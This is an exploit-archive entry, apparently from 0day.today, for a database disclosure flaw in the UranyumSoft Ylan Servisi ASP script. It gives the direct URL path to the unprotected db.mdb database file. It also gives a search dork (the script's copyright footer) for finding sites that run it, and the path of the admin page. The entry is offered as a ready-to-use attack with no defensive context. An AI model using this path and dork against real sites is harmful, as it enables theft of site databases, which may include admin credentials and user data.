id: 10510
date: 12/30/2009
title: UranyumSoft Ylan Servisi Database Disclosure Vulnerability
author: LionTurk
cves: 

==========================================================
UranyumSoft Ylan Servisi Database Disclosure Vulnerability
==========================================================

============================================================================== 
 
    
 
    [»] Script:             [ UranyumSoft ?lan Servisi  ] 
 
    [»] Language:           [ ASP ] 
 
    [»] Download:           [ http://aspindir.com/Goster/5420] 
########################################################################### 
 
    
 
===[ Exploit And Dork  ]=== 
 
    
 
  [»] http://server/[dizin]/database/db.mdb
 
  
 
 
  [»] Copyright 2008 UranyumSoft.com | T?m haklar? sakl?d?r.
 
  [»]   Admin Page: /yetki.asp
 
 
 
 
Author:  LionTurk <-  



#  0day.today [2023-03-24]  #